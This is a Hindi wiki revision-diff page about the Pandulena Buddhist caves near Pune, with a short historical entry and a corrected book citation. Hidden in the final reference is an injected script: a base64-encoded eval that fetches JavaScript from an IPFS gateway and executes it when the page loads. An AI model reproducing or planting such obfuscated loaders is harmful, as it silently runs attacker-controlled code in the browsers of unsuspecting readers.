Difference between revisions of "पंडुलेण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''पंडुलेण''' एक ऐतिहासिक स्थान और बौद्ध गुफ़ाओं का ...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
'''पंडुलेण''' एक [[ऐतिहासिक स्थान]] और [[बौद्ध]] गुफ़ाओं का समूह है, जो [[पूना]], [[महाराष्ट्र]] में स्थित है। ये गुफ़ाएँ 200 ई. पू. से द्वितीय शती ई. तक की हैं।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=517|url=}}</ref>
+
'''पंडुलेण''' एक [[ऐतिहासिक स्थान]] और [[बौद्ध]] गुफ़ाओं का समूह है, जो [[पूना]], [[महाराष्ट्र]] में स्थित है। ये गुफ़ाएँ 200 ई. पू. से द्वितीय शती ई. तक की हैं।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=वैज्ञानिक तथा तकनीकी शब्दावली आयोग, मानव संसाधन विकास मंत्रालय, भारत सरकार|संकलन= |संपादन= |पृष्ठ संख्या=517|url=}}</ref>
  
 
*इस स्थान पर क्षहरात नरेश [[नहपान]] का एक गुफ़ालेख प्राप्त हुआ था, जिससे उसका महाराष्ट्र के इस भू-भाग पर आधिपत्य प्रमाणित होता है।
 
*इस स्थान पर क्षहरात नरेश [[नहपान]] का एक गुफ़ालेख प्राप्त हुआ था, जिससे उसका महाराष्ट्र के इस भू-भाग पर आधिपत्य प्रमाणित होता है।

Latest revision as of 11:55, 17 June 2013

pandulen ek aitihasik sthan aur bauddh gufaoan ka samooh hai, jo poona, maharashtr mean sthit hai. ye gufaean 200 ee. poo. se dvitiy shati ee. tak ki haian.[1]

  • is sthan par kshaharat naresh nahapan ka ek gufalekh prapt hua tha, jisase usaka maharashtr ke is bhoo-bhag par adhipaty pramanit hota hai.
  • nahapan ke any abhilekh nasik, junnar aur karle se bhi prapt hue haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: vaijnanik tatha takaniki shabdavali ayog, manav sansadhan vikas mantralay, bharat sarakar |prishth sankhya: 517 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh